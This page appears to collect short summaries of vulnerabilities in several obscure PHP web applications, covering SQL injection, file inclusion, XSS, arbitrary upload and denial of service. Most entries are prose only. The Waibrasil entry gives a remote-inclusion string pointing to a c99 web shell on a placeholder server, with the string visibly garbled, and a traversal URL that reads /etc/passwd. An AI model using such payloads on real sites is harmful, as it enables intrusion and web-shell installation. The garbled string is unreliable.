A vulnerability in Aqar Script V.1 allows an attacker to bypass authentication and gain access to the system. The vulnerability exists due to insufficient validation of user-supplied input in the 'qa2ema.php' script. A remote attacker can exploit this vulnerability to bypass authentication and gain access to the system.
An attacker can exploit this vulnerability by sending a maliciously crafted SQL query to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the ‘union select’ statement to retrieve data from the database. The attacker can also use the ‘group_concat’ statement to retrieve multiple rows of data from the database.
A local file inclusion vulnerability exists in 724CMS Enterprise Version 4.59 due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to include arbitrary local files on the web server, which can lead to the disclosure of sensitive information, or the execution of arbitrary code.
Fiomental & Coolsis Backoffice is vulnerable to Blind SQL Injection, XSS and Remote Arbitrary Upload Vulnerability. Blind SQL Injection can be exploited by sending a malicious SQL query to the vulnerable parameter. XSS can be exploited by sending a malicious script to the vulnerable parameter. Remote Arbitrary Upload Vulnerability can be exploited by uploading a malicious file to the vulnerable parameter.
Waibrasil Remote / Local File Inclusion vulnerability allows an attacker to include a file from a remote or local server via a vulnerable web application. The attacker can exploit this issue by manipulating the 'conteudo' parameter value in a malicious manner to execute arbitrary code. The vulnerable code can be found in the 'index.php' script. The attacker can use the 'hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt?' exploit to include a remote file from a malicious server. The live demo of this exploit can be seen in the 'http://[site]/index.php?conteudo=../../../../etc/passwd' URL.
Two SQL Injection vulnerabilities were discovered in PHPKB Knowledge Base Software v2 Multilanguage Support. The first vulnerability is located in the 'email.php' file with the vulnerable parameter 'ID'. The second vulnerability is located in the 'comment.php' file with the vulnerable parameter 'ID'. An attacker can inject malicious SQL queries to gain access to sensitive information from the database.
A SQL injection vulnerability exists in 724CMS Enterprise Version 4.59. An attacker can send a maliciously crafted HTTP request to the vulnerable server, which can allow the attacker to execute arbitrary SQL commands on the underlying database.
29o3 CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
With setting of large values of width and height it's possible to create large load at the server.
A Denial of Service vulnerability exists in MiniManager For Mangos/Trinity Server. The vulnerability is caused due to an unspecified error when handling a specially crafted HTTP request. This can be exploited to cause a DoS condition by sending a specially crafted HTTP request to the vulnerable script.
Services By CQR